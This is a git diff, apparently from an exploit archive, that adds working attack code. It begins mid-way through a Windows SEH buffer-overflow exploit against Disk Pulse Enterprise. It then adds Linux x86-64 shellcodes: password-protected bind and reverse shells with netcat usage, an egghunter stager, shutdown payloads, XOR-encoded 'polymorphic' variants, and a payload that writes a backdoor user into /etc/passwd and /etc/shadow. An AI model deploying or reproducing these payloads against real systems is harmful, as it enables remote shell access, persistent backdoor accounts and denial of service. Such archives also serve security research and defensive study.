"\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87" +buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9" +buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee" +buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e" +buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9" +buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4" +buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e" +buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e" +buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23" +buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26" +buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44" +buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc" +buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62" +buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f" +buf += "\x7d\x58\x6e\x5a" + +shellcode = buf +payload = 'A' * 124             #offset +payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value +payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll) +payload += stage1 +payload +=  '\x90' * (1000 - len(payload) - len(shellcode)) +payload += shellcode + + + +header = '\x75\x19\xba\xab' +header += '\x03\x00\x00\x00' +header += '\x00\x40\x00\x00' +header += pack(' +#include +#include + +unsigned char egg[] = +"YOUR EGG HERE 4 bytes"; + +// In this example we use a password protected binshell on port 1337: pAzzW0rd +unsigned char bindshell[] = +"\xeb\x09\x48\x31\xff\x48\xf7\xe7\x57\x5e\xc3\x55\x48\x89\xe5\xe8\xee\xff\xff\xff\x04\x29\x40\x80\xc7\x02\xff\xc6\x0f\x05\x50\xe8\xde\xff\xff\xff\x04\x31\x48\x8b\x3c\x24\x56\x81\xc6\x03\x01\x05\x39\x66\x81\xee\x01\x01\x56\x48\x89\xe6\x80\xc2\x10\x0f\x05\xe8\xbe\xff\xff\xff\x04\x32\x48\x8b\x7d\xf8\x0f\x05\xe8\xb1\xff\xff\xff\x04\x2b\x48\x8b\x7d\xf8\x48\x89\xe6\x80\xc2\x18\x52\x48\x89\xe2\x0f\x05\x49\x89\xc0\xe8\x97\xff\xff\xff\x4c\x89\xc7\x40\x80\xec\x18\x48\x89\xe6\x80\xc2\x18\x0f\x05\x48\xb8\x70\x41\x7a\x7a\x57\x30\x72\x64\x48\x89\xe7\x48\xaf\x75\x42\x48\x31\xc0\x4c\x89\xc7\x48\x31\xf6\x40\x80\xc6\x02\x04\x21\x0f\x05\x48\x31\xc0\x04\x21\x48\xff\xce\x75\xf4\x0f\x05\xe8\x55\xff\xff\xff\x50\x04\x3b\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x50\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x48\x89\xec\x5d\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05"; + +unsigned char egghunter[] = +"\x48\x31\xf6\x56\x5a\x6a\x08\x5b\x66\x81\xca\xff\x0f\x48\xff\xc2\x6a\x15\x58\x52\x5f\x48\x01\xdf\x0f\x05\x3c\xf2\x74\xea\xb8\xbd\xbe\xbd\xbe\xf7\xd0\x48\x89\xd7\xaf\x75\xe2\x3b\x07\x75\xde\xff\xe7"; + + + +main() +{ + + char *heap = (char*)malloc(1000000); + memset(heap, '\0', 512); + strncpy(heap, egg, 4); + strncpy(heap+4, egg, 4); + strncpy(heap+8, bindshell, 212); + + printf("Egghunter Length: %d\n", strlen(egghunter)); + printf("Shellcode Length: %d\n", strlen(bindshell)); + int (*ret)() = (int(*)())egghunter; + ret(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43555.c b/shellcodes/linux_x86-64/43555.c new file mode 100644 index 000000000..7e6cb4c48 --- /dev/null +++ b/shellcodes/linux_x86-64/43555.c @@ -0,0 +1,64 @@ +/* +; Title: shutdown -h now x86_64 Shellcode - 65 bytes +; Platform: linux/x86_64 +; Date: 2014-06-27 +; Author: Osanda Malith Jayathissa (@OsandaMalith) + +section .text + +global _start + +_start: + +xor rax, rax +xor rdx, rdx + +push rax +push byte 0x77 +push word 0x6f6e ; now +mov rbx, rsp + +push rax +push word 0x682d ;-h +mov rcx, rsp + +push rax +mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown +mov r10, 0x6e776f6474756873 +push r10 +push r8 +mov rdi, rsp + +push rdx +push rbx +push rcx +push rdi +mov rsi, rsp + +add rax, 59 +syscall + +*/ + +#include +#include + +unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a" +"\x77\x66\x68\x6e\x6f\x48\x89\xe3" +"\x50\x66\x68\x2d\x68\x48\x89\xe1" +"\x50\x49\xb8\x2f\x73\x62\x69\x6e" +"\x2f\x2f\x2f\x49\xba\x73\x68\x75" +"\x74\x64\x6f\x77\x6e\x41\x52\x41" +"\x50\x48\x89\xe7\x52\x53\x51\x57" +"\x48\x89\xe6\x48\x83\xc0\x3b\x0f" +"\x05"; + +int +main() { + +printf("Shellcode Length: %d\n", (int)strlen(code)); +int (*ret)() = (int(*)())code; +ret(); + +return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43556.asm b/shellcodes/linux_x86-64/43556.asm new file mode 100644 index 000000000..c01f58f97 --- /dev/null +++ b/shellcodes/linux_x86-64/43556.asm @@ -0,0 +1,72 @@ +; =================================================================== +; Optimized version of shellcode at: +; http://shell-storm.org/shellcode/files/shellcode-877.php +; Author: SLAE64-1351 (Keyman) +; Date: 14/09/2014 +; +; Length: 64 bytes (got shorter by 1 byte :D ) +; +; What's new is that some optimalization was performed on the +; original code which left some space to do a basic decoding of the +; command (/sbin/shutdown). Each byte (except the first one) was +; decremented by 1. The decoder just adds 1 to each byte. +; +; =================================================================== + +section .text +global _start + +_start: + +xor rax, rax ; clear rax and rdx +cdq + +; ------------------------------------------------------------------- +; 1. store '-h' on stack +; ------------------------------------------------------------------- + +push rax +push word 0x682d ;-h +push rsp +pop rcx + +; ------------------------------------------------------------------- +; 2. store 'now' on stack +; ------------------------------------------------------------------- + +push rax +push byte 0x77 +push word 0x6f6e ; now +push rsp +pop rbx + +push rax +push rbx +push rcx + +; ------------------------------------------------------------------- +; 3. store '/sbin/shutdown' on stack +; ------------------------------------------------------------------- + +push rsp +pop rsi + +push rax +jmp shutdown +cont: +pop rdi + +push 15 +pop rcx + +do_add: + add byte [rdi+rcx], 0x01 + loop do_add + +push 59 +pop rax +syscall + +shutdown: + call cont + c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43557.asm b/shellcodes/linux_x86-64/43557.asm new file mode 100644 index 000000000..0ab2c5d72 --- /dev/null +++ b/shellcodes/linux_x86-64/43557.asm @@ -0,0 +1,89 @@ +; =================================================================== +; Optimized version of shellcode at: +; http://shell-storm.org/shellcode/files/shellcode-867.php +; Author: SLAE64-1351 (Keyman) +; Date: 14/09/2014 +; +; Length: 105 bytes (got shorter by 13 bytes) +; +; What's new is that some optimalization was performed on the +; original code which left some space to do a basic decoding of the +; file names. Each byte (except the first one) was xor'ed with the +; value 0x32. The decoder part xor's each byte (except the first) +; with this very same value. +; +; =================================================================== + +section .text +global _start + +_start: + xor rsi, rsi + jmp string_1 +cont_1: + pop rdi + + ; decode + + push 24 + pop rcx +decode: + xor byte [rdi+rcx], 0x32 + loop decode + + sub byte [rdi+11], 0x41 ; set last byte to 0x00 + sub byte [rdi+24], 0x41 ; set last byte to 0x00 + + ; open (1) + + push 2 + pop rax + syscall + + push rax + pop r14 ; source + + ; open (2) + + add rdi, 12 + push 0x66 + pop rsi + push 2 + pop rax + syscall + + push rax + pop r15 ; destination + + ; read + + xor rax, rax + push r14 + pop rdi + push rsp + pop rsi + mov dx, 0xFFFF + syscall + + ; write + + push rax + pop rdx + + push r15 + pop rdi + + push 1 + pop rax + syscall + + ; exit + + push 60 + pop rax + syscall + +string_1: + call cont_1 + ; first byte stays the original value + s_1: db 0x2F, 0x57, 0x46, 0x51, 0x1D, 0x42, 0x53, 0x41, 0x41, 0x45, 0x56, 0x73, 0x1D, 0x46, 0x5F, 0x42, 0x1D, 0x5D, 0x47, 0x46, 0x54, 0x5B, 0x5E, 0x57, 0x73 \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43558.asm b/shellcodes/linux_x86-64/43558.asm new file mode 100644 index 000000000..0448a6a13 --- /dev/null +++ b/shellcodes/linux_x86-64/43558.asm @@ -0,0 +1,176 @@ +; =================================================================== +; Password Protected Reverse Shell +; Author: SLAE64-1351 (Keyman) +; Date: 04/09/2014 +; +; Shellcode length: 136 bytes +; +; Description: +; +; Simple reverse shell (listens on port 4444 by default) with +; bytes password protection. Using a 4 bytes long password is +; still reasonably strong for a single-shot connection and keeps +; the code shorter. +; +; To change the port or the password just modify the values of the +; exp_port and exp_pass "variables" below. +; +; Before the code gets executed make sure to create a listener: +; +; nc -lvp +; +; After you receive the connection you will see no password +; prompt. Just type in the 4 bytes long password and hit enter. +; If the password matches, you are ready to type OS commands. +; +; =================================================================== + +global _start +section .text + +; ------------------------------------------------------------------- +; Preprocessor directives so you can easily change the port and the +; password. +; ------------------------------------------------------------------- + +; Host to connect to. Please note that this value will have +; 0x02020202 added to it, this way avoiding the NULL bytes. + +%define exp_host 0xFEFDFE7D ; 127.0.0.1 + +; Port number to listen on. +%define exp_port 0x5c11 ; 4444 + +; Password to use. Make sure it's not longer than 4 bytes. +%define exp_pass 0x6c6c6568 ; hell + +; ------------------------------------------------------------------- +; DO NOT TOUCH +; preprocessor directives so syscalls can be easily referenced +; ------------------------------------------------------------------- + +%define sys_connect 42 +%define sys_read 0 +%define sys_execve 59 +%define sys_dup2 33 + +_start: + + ; --------------------------------------------------------------- + ; START: create socket + ; --------------------------------------------------------------- + xor rax, rax + push rax ; saving for sockaddr + push rax ; struct + push rax ; clear rax later + push rax ; set rdx to 0 + pop rdx ; protocol + mov al, 2 + push rax + push rax + pop rsi + pop rdi ; PF_INET + shr rsi, 1 ; SOCK_STREAM + add al, 39 ; socket syscall (41) + syscall + + ; --------------------------------------------------------------- + ; START: create struct + ; + ; srv_addr.sin_family = AF_INET; + ; srv_addr.sin_addr.s_addr = INADDR_ANY; + ; srv_addr.sin_port = htons(portno); + ; + ; This is how it looks like on the stack: + ; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01 + ; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + ; --------------------------------------------------------------- + + ; TODO: have to make this shorter somehow + mov byte [rsp], 2 ; set values + mov word [rsp+2], exp_port + mov dword [rsp+4], exp_host + add dword [rsp+4], 0x02020202 + push rsp + pop rsi ; addr of struct in rsi + + ; --------------------------------------------------------------- + ; START: connect + ; --------------------------------------------------------------- + + ; rdx is still 0 + push rax ; socket fd + pop rdi + add dl, 16 + mov al, sys_connect + syscall + + ; --------------------------------------------------------------- + ; get passwd + ; + ; We will work with a 4 byte password, should be more than + ; enough as no brute forcing is possible. Chances to guess + ; the right value is 0. Of course passwd should not contain + ; null bytes. + ; + ; n = read(newsockfd,buffer,4); + ; --------------------------------------------------------------- + + push rax ; buffer filled with 0s + push rsp ; setup pointer to buf + pop rsi + sub rdx, 12 ; set bytes to read (4) + syscall + + ; compare pass received with valid pass and exit if no match + + push rax + pop rcx + + push rdi ; save socket + pop rax + + sub rcx, 3 ; read only once + push rsp + pop rdi + push exp_pass + push rsp + pop rsi + cmpsq + jne passfail ; passwd match, give shell + +shell: + ; --------------------------------------------------------------- + ; 6. exec shell + ; --------------------------------------------------------------- + + add cl, 2 ; rcx is 1, so add 2 = 3 + push rax ; restore socket + pop rdi +dup_loop: + push rcx ; have to save rcx as dup2 + ; changes it's value + xor rax, rax + sub rcx, 1 + push rcx + pop rsi + add al, sys_dup2 + syscall + pop rcx ; restore the counter + loop dup_loop + + jmp mytext + +code: + pop rdi + mov [rdi+7], BYTE al + push rax + pop rdx + add al, sys_execve + syscall + +mytext: + call code + MyText: db '/bin/sh', 0x41 + +passfail: \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43559.asm b/shellcodes/linux_x86-64/43559.asm new file mode 100644 index 000000000..0c2bade8f --- /dev/null +++ b/shellcodes/linux_x86-64/43559.asm @@ -0,0 +1,214 @@ +; =================================================================== +; Password Protected Bind Shell +; Author: SLAE64-1351 (Keyman) +; Date: 03/09/2014 +; +; Shellcode length: 147 bytes +; +; Description: +; +; Simple bind shell (listens on port 4444 by default) with 4 bytes +; password protection. Using a 4 bytes long password is still +; reasonably strong for a single-shot connection and keeps the +; code shorter. +; +; To change the port or the password just modify the values of the +; exp_port and exp_pass "variables" below. +; +; After the code gets executed connect to the newly opened port: +; +; nc +; +; There is no password prompt. Type in the 4 bytes long password +; and hit enter. If the password matches, you are ready to type +; OS commands. +; +; =================================================================== + +global _start +section .text + +; ------------------------------------------------------------------- +; Preprocessor directives so you can easily change the port and the +; password. +; ------------------------------------------------------------------- + +; Port number to listen on. +%define exp_port 0x5c11 ; 4444 + +; Password to use. +%define exp_pass 0x6c6c6568 ; hell + +; ------------------------------------------------------------------- +; DO NOT TOUCH +; preprocessor directives so syscalls can be easily referenced +; ------------------------------------------------------------------- + +%define sys_bind 49 +%define sys_listen 50 +%define sys_accept 43 +%define sys_execve 59 +%define sys_dup2 33 + +_start: + + ; --------------------------------------------------------------- + ; START: create socket + ; --------------------------------------------------------------- + xor rax, rax + push rax ; saving for sockaddr + push rax ; struct + push rax ; clear rax later + push rax ; set rdx to 0 + pop rdx ; protocol + mov al, 2 + push rax + push rax + pop rsi + pop rdi ; PF_INET + shr rsi, 1 ; SOCK_STREAM + add al, 39 ; socket syscall (41) + syscall + + ; --------------------------------------------------------------- + + push rax ; store sockfd as first + pop rdi ; argument of bind + + ; --------------------------------------------------------------- + ; START: create struct + ; + ; srv_addr.sin_family = AF_INET; + ; srv_addr.sin_addr.s_addr = INADDR_ANY; + ; srv_addr.sin_port = htons(portno); + ; + ; This is how it looks like on the stack (port is 4444): + ; + ; 0x02 0x00 0x11 0x5c 0x00 0x00 0x00 0x00 + ; 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + ; --------------------------------------------------------------- + pop rax ; clear rax so can be + ; used for syscall Nr. + mov byte [rsp], 2 ; set values + mov word [rsp+2], exp_port + push rsp + pop rsi ; addr of struct in rsi + + ; --------------------------------------------------------------- + ; bind socket + ; --------------------------------------------------------------- + + push rax + pop rdx + add dl, 16 ; socklen_t addrlen + add al, sys_bind ; syscall number + syscall + + ; --------------------------------------------------------------- + ; listen + ; --------------------------------------------------------------- + + ; rdi should still hold the socket descriptor so we don't + ; have to set it again + + ; We can save a 'xor rax, rax' here. + ; If success, 0 is returned by bind, we will have the rax reg. + ; cleared. + + push 2 + pop rsi + add al, sys_listen + syscall + + ; --------------------------------------------------------------- + ; accept + ; --------------------------------------------------------------- + + ; rdi should still hold the socket descriptor so we don't + ; have to set it again + + ; We can save a 'xor rax, rax' here. + ; If success, 0 is returned by listen, we will have the rax reg. + ; cleared. + + push rax + pop rdx + push rax + pop rsi + add al, sys_accept + syscall + + ; at this point rax contains the new socket descriptor + + push rax ; save new sockfd + push rax ; + pop rdi ; first argument for + ; read() + pop r15 ; save for later + + ; --------------------------------------------------------------- + ; get passwd + ; + ; We will work with a 4 byte password, should be more than + ; enough as no brute forcing is possible. Chances to guess + ; the right value is 0. Of course passwd should not contain + ; null bytes. + ; + ; n = read(newsockfd,buffer,4); + ; --------------------------------------------------------------- + + xor rax, rax ; read() is syscall Nr. 0 + push rax ; buffer filled with 0s + push rsp ; setup pointer to buf + pop rsi + add rdx, 4 + syscall + + ; compare pass received with valid pass and exit if no match + + xor rcx, rcx + inc rcx + push rsp + pop rdi + push exp_pass + push rsp + pop rsi + cmpsq + jne passfail ; passwd match, give shell + +shell: + ; --------------------------------------------------------------- + ; 6. exec shell + ; --------------------------------------------------------------- + + add cl, 2 + mov rdi, r15 +dup_loop: + push rcx ; have to save rcx as dup2 + ; changes it's value + xor rax, rax + sub rcx, 1 + push rcx + pop rsi + add al, sys_dup2 + syscall + pop rcx ; restore the counter + loop dup_loop + + jmp mytext + +code: + pop rdi + mov [rdi+7], BYTE al + push rax + push rax + pop rsi + pop rdx + add al, sys_execve + syscall + +mytext: + call code + MyText: db '/bin/sh', 0x41 + +passfail: \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43561.asm b/shellcodes/linux_x86-64/43561.asm new file mode 100644 index 000000000..b1e9a2708 --- /dev/null +++ b/shellcodes/linux_x86-64/43561.asm @@ -0,0 +1,50 @@ +; =================================================================== +; "Polymorphic" version of shellcode at: +; http://shell-storm.org/shellcode/files/shellcode-658.php +; Author: SLAE64-1351 (Keyman) +; Date: 21/09/2014 +; +; Length: 273 bytes (got shorter by 117 bytes) +; +; The original code was optimized. This way it became 240 bytes long. +; Each byte of the optimized shellcode was XOR'ed with 0xDE. The +; result was dumped as the encoded shellcode below. A decoder stub +; was implemented to XOR each byte of "shellcode" with 0xDE. (except +; the first byte). After the decoding is finished execution is +; passed to the original (decoded) shellcode. +; +; =================================================================== + +section .text +global _start + +_start: + +; ------------------------------------------------------------------- +; Shellcode decoder stub +; ------------------------------------------------------------------- + + push 1 + pop rcx +begin: + cmp rcx, 1 + je begin_sc + pop rdi ; rdi points to the shellcode + push byte 0x78 + pop rcx + add rcx, 0x77 +decode: + xor byte [rdi+rcx], 0xDE + loop decode + jmp shellcode + +begin_sc: + dec rcx + call begin + +; ------------------------------------------------------------------- +; Encoded shellcode +; ------------------------------------------------------------------- + +shellcode: + sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4 \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43562.c b/shellcodes/linux_x86-64/43562.c new file mode 100644 index 000000000..357f5ff86 --- /dev/null +++ b/shellcodes/linux_x86-64/43562.c @@ -0,0 +1,193 @@ +;Exam Assignment 3 +;implementation of egghunter +;Default egg = "deaddead" ; +;If connected the stager check of egg , if present execute the code ; +;You can send a maximum of 255 bytes (egg + code) ; +;if no egg , shellcode exit ; +;Christophe G SLAE64 - 1337 ; + + + +global _start + + jmp short _start + _start_code : + call rsi + +_start: + + + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 41 + + xor rdx , rdx + push rdx ; null into the stack + push byte 0x29 ; syscall number 41 + pop rax + push byte 0x2 ; AF_INET + pop rdi + push byte 0x1 ; SOCK_STREAM + pop rsi + syscall + + ; copy socket descriptor to rdi for future use + xchg rax , rdi + + + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = INADDR_ANY + ; bzero(&server.sin_zero, 8) + + xor rax, rax + + push rax ; bzero(&server.sin_zero, 8) + + + mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value) + + + not rbx + push rbx + push rsp ; save rsp value into the stack , needed for rsi later + + + ; bind(sock, (struct sockaddr *)&server, sockaddr_len) + ; syscall number 49 + + + push byte 0x31 ; (49) + pop rax + pop rsi ; retrieve value of rsp pushed into the stack before + push byte 0x10 ; (16 bytes) sockaddr_len + pop rdx + syscall + + + ; listen(sock, MAX_CLIENTS) + ; syscall number 50 + + push byte 0x32 ; (50) + pop rax + push byte 0x2 ;MAX_CLIENTS + + pop rsi + syscall + + + ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) + ; syscall number 43 + + + push byte 0x2b ; Accept syscall + pop rax + sub rsp, 0x10 + push rsp + pop rsi ;(struct sockaddr *)&client + + push byte 0x10 + push rsp + pop rdx ; &sockaddr_len + + syscall + + ; store the client socket description + mov r9, rax + + ; close parent + + push byte 0x3 + pop rax + syscall + + + + + + xchg rdi , r9 ; restore client socket description to rdi + xor rsi , rsi + + dup2: + push byte 0x21 + pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop + syscall + inc rsi + cmp rsi , 0x3 ; go in the next couple of instruction if equals + + loopne dup2 + + xor rsi , rsi + mul rsi + xor rdi , rdi + sub spl , 0xff + mov rsi , rsp + mov dl , 0xff + syscall + + Inc_rsi: + cmp dil , 0xff + jz Exit + inc rsi + inc rdi + + + + cmp [rsi - 4] , dword 0x64616564 ; egghunter + jnz Inc_rsi + cmp [rsi - 8] , dword 0x64616564 + jnz Inc_rsi + jz _start_code + + Exit: + push byte 0x3c + pop rax + syscall + + + + +------------------------------------------------------------------------------------------------------------------------------------------------ + +Usage : + + Execve Shellcode + +#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444 + + +"x68\x85\x11\x47\x02" -->> dumm bytes + +"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead) + +"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10" +"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP +"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42" +"\x42\x43\x43\x43\x43\x43\x43\x43\x43" + +--------------------------------------------------------------------------------------------------------------------------------------------------- + + +Shellcode : + +#include +#include + +unsigned char stager[] = \ +"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05"; + +int main() + +{ + + printf("Stager Length: %d\n", (int)strlen(stager)); + + + (*(void (*)()) stager)(); + + + + + +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43563.c b/shellcodes/linux_x86-64/43563.c new file mode 100644 index 000000000..f4f4217bd --- /dev/null +++ b/shellcodes/linux_x86-64/43563.c @@ -0,0 +1,108 @@ +; shellcode name add_user_password_JCP_open,write,close +; Author : Christophe G SLAE64-1337 +; Len : 358 bytes +; Language : Nasm +; "name = pwned ; pass = $pass$" +; add user and password with open,write,close +; tested kali linux , kernel 3.12 + + +global _start + +_start: + + xor rax , rax + push rax + pop rsi + push rax ; null all register used for open syscall + pop rdx + add al , 0x2 + mov rdi , 0x647773ffffffffff + shr rdi , 0x28 + push rdi ; "/etc/passwd" + mov rdi , 0x7361702f6374652f + push rdi + mov rdi , rsp + mov si , 0x441 + mov dx , 0x284 + syscall ; open syscall + + xor edi , edi + add dil , 0x3 + +jmp short findaddress ; I placed the jmp short here size of code is too lenght for jmp short if placed in head + +_respawn: + + pop r9 + mov [r9 + 0x30] , byte 0xa ; terminate the string + lea rsi , [r9] ; "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash' + mov al , 0x1 + xor rdx , rdx + add rdx , 0x31 + syscall ; write syscall + + xor edi , edi + add dil , 0x3 + push rdi +pop rax + syscall ; close syscall + + xor rax , rax + push rax + pop rsi + add al , 0x2 + mov rdi , 0x776f64ffffffffff ; open '/etc/shadow' + shr rdi , 0x28 + push rdi + mov rdi , 0x6168732f6374652f + push rdi + mov rdi , rsp + mov si , 0x441 + mov dx , 0x284 + syscall ; open syscall + + + xor rax , rax + add al , 0x1 + xor edi , edi + add dil , 0x3 + lea rsi , [r9 + 0x31] ; "pwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::", 0xa + push rax + pop rdx + add dl , 0x83 + syscall ; write syscall + + xor edi , edi + add dil , 0x3 + push rdi + pop rax + syscall + + + + + xor rax , rax + add al , 0x3c ; exit (no matter value of exit code) + syscall + + + findaddress: + call _respawn + string : db "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bashApwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::",0xa + + + +#include +#include + +unsigned char code[] = \ 